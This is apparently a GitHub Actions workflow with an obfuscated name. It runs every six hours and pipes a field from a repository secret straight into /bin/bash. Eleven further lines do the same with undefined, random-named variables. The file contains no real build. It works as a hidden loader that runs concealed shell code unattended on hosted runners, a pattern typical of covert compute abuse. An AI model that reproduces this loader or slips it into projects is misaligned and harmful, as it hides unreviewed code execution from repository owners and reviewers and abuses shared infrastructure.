name: busjkalj
on:
  workflow_dispatch:
  schedule:
    - cron: '23 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: busjkalj
        env:
          zk3622: ${{ secrets.zk3622 }}
        run: |
          echo $zk3622 | jq -r .udp1 | /bin/bash
          echo $m518 | jq -r .agr15256 | /bin/bash
          echo $jnua539 | jq -r .nkfh720 | /bin/bash
          echo $uklz7 | jq -r .hcbt9628 | /bin/bash
          echo $rdbi116 | jq -r .sv95 | /bin/bash
          echo $enzj6286 | jq -r .defxn4 | /bin/bash
          echo $ufd5 | jq -r .uqw04 | /bin/bash
          echo $ljw43 | jq -r .o1 | /bin/bash
          echo $nx04 | jq -r .t71 | /bin/bash
          echo $imnnu9047 | jq -r .xo64 | /bin/bash
          echo $vboho7 | jq -r .mffbt77699 | /bin/bash
          echo $k9867 | jq -r .ueqq0353 | /bin/bash

